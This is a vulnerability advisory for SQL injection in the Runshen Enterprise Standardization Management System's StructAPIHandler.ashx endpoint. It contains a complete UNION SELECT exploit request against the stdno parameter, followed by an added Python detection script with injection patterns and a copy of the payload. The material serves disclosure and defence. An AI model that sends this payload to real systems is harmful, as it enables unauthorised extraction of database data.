Vulnerability description
The Runshen Enterprise Standardization Management System (润申企业标准化管理系统) has a SQL injection vulnerability in StructAPIHandler.ashx; an attacker can exploit it to obtain sensitive data from the database.
POST /PDCA/ashx/StructAPIHandler.ashx?action=GetQiang HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Cookie:
Accept-Encoding: gzip
stdno=-1 union select 1,2,3,4,5,6,7,8,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27jyywqlnd%27)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
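A detection check for the request shown above, written as an added example for defenders (it is not part of the advisory or the vendor's code). It assumes that a legitimate stdno value is a plain integer identifier and that raw requests including POST bodies are available from a reverse proxy or WAF capture; the placeholder host and the benign sample are constructed.

```python
"""Flag union-based SQL injection attempts against the StructAPIHandler.ashx
endpoint named in the advisory. Added example; assumes stdno is normally a
plain integer and that full request captures (with bodies) are available."""
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/PDCA/ashx/StructAPIHandler.ashx"

# Patterns characteristic of the request in the advisory: UNION SELECT with a
# padded column list, SQL Server helper functions, and a trailing comment.
SUSPICIOUS = [
    re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I),
    re.compile(r"\b(hashbytes|fn_sqlvarbasetostr)\b", re.I),
    re.compile(r"--\s*$|/\*"),
]

def parse_raw_request(raw: str):
    """Split a raw HTTP request into (method, path, query dict, body dict)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query), parse_qs(body)

def is_plain_integer(value: str) -> bool:
    """Allow-list check: a legitimate stdno is digits only (assumption)."""
    return re.fullmatch(r"-?\d{1,10}", value.strip()) is not None

def inspect_request(raw: str) -> list[str]:
    """Return findings for the stdno parameter; an empty list means nothing seen."""
    _, path, _, body = parse_raw_request(raw)
    if path != TARGET_PATH:
        return []
    findings = []
    for value in body.get("stdno", []):
        if not is_plain_integer(value):
            findings.append("stdno is not a plain integer")
        findings += [f"stdno matches {p.pattern!r}" for p in SUSPICIOUS if p.search(value)]
    return findings

# Constructed sample requests: a benign lookup and the payload from the advisory.
SAMPLE_BENIGN = ("POST /PDCA/ashx/StructAPIHandler.ashx?action=GetQiang HTTP/1.1\r\n"
                 "Host: placeholder.invalid\r\n\r\nstdno=42")
SAMPLE_ATTACK = ("POST /PDCA/ashx/StructAPIHandler.ashx?action=GetQiang HTTP/1.1\r\n"
                 "Host: placeholder.invalid\r\n\r\nstdno=-1 union select 1,2,3,4,5,6,7,8,"
                 "sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27jyywqlnd%27)),10,11,12,"
                 "13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--")

if __name__ == "__main__":
    for name, raw in (("benign", SAMPLE_BENIGN), ("attack", SAMPLE_ATTACK)):
        print(name, inspect_request(raw) or ["no findings"])
```

The same allow-list rule (reject anything in stdno that is not an integer before it reaches the query) is the server-side fix a parameterized query should be paired with.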